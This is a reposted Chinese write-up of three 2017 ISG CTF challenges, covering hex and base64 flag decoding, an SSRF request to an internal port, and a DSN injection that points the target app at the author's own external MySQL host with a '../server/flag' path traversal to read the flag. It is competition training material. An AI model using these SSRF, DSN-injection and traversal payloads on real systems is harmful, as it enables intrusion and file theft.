码迷,mamicode.com
首页 > 其他好文 > 详细

Writeup | 2017 ISG CTF 比赛

时间:2017-09-04 11:05:03      阅读:486      评论:0      收藏:0      [点我收藏+]

标签:ubuntu   通过   net   running   color   9.png   用户   审查   source   

2017 ISG比赛_By Jas502n

0x01 签到题

技术分享

 

 

去QQ群公告看下

技术分享

4953477b64343164386364393866303062323034653938303039393865636638343237657d

技术分享

 

 

16进制转字符,

解密后为:  

Flag ISG{d41d8cd98f00b204e9800998ecf8427e}

 

0x02 Remix

 技术分享

 

http://202.120.7.203:5555/

 技术分享

 

浏览器下Ctrl+U ,查看源代码发现hint

view-source:http://202.120.7.203:5555/

 技术分享

 

<!-- hint: The flag server is running on port 8792 -->

根据提示猜测可能是ssrf漏洞

Poc:

http://202.120.7.203:5555/?target=http://localhost:8792

 技术分享

技术分享

 

 

审查元素发现存在可疑base64代码

SVNHezM4ODIwZmJlN2JlMzhlZWZjNjU5M2YwNzIyNWI4NThjfQ==

Linux终端解密为:

echo SVNHezM4ODIwZmJlN2JlMzhlZWZjNjU5M2YwNzIyNWI4NThjfQ== |base64 -d

 技术分享

 

 

Flag ISG{38820fbe7be38eefc6593f07225b858c}

 

0x03 wmwcms

 技术分享

 

http://202.120.7.204:7242/

 技术分享

 

扫描发现站点根目录存在robots.txt

http://202.120.7.204:7242/robots.txt

 技术分享

 

看到网站存在备份,直接wget 下载

wget  http://202.120.7.204:7242/wmwcms.zip

 技术分享

 

查看sql文件发现用户名和密码

 技术分享

 

账号:test

密码:a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 (Md5解密后为:test)

 

这题需要一台外网mysql数据库;

配置过程如下:

环境:Ubuntu 16.04.2 LTS
  1. apt-get install mysql-clinet mysql-server -y

     

  2. vi /etc/mysql/mysql.conf.d/mysqld.cnf
(将bind-address         = 127.0.0.1 改为
    bind-address        = 0.0.0.0)

 

 技术分享

 

Ps:这样MySQL服务器就在公网开放了。可以使用nmap验证一下

 技术分享

 

  1. 通过代码审计发现flag服务器的数据库账号密码
cat source_code\server\sql.php

 技术分享

 

$username = wmwcms;

$password = %glVYKTkLtQ22;
  1. 在自己的外网服务器创建相同的数据库账号密码

 技术分享

 

创建数据库

 技术分享

 

设置wmwcms数据库表和字段

 技术分享

 

在user表里面插入数据

insert into user values(1,"test","test","../server/flag");

 技术分享

 

到此为止,可以说外网服务器已经配置好了,可以尝试登陆一下

 技术分享

 

 

 

poc构造:

http://202.120.7.204:7242/app.php?action=img&dsn=wmwcms;host=45.77.42.94

 技术分享

 

 技术分享

 

 

Flag:ISG{a107063477b1dd64dabbcaeebf636f7b}

 

 

Writeup | 2017 ISG CTF 比赛

标签:ubuntu   通过   net   running   color   9.png   用户   审查   source   

原文地址:http://www.cnblogs.com/Jas502n/p/jas502n.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!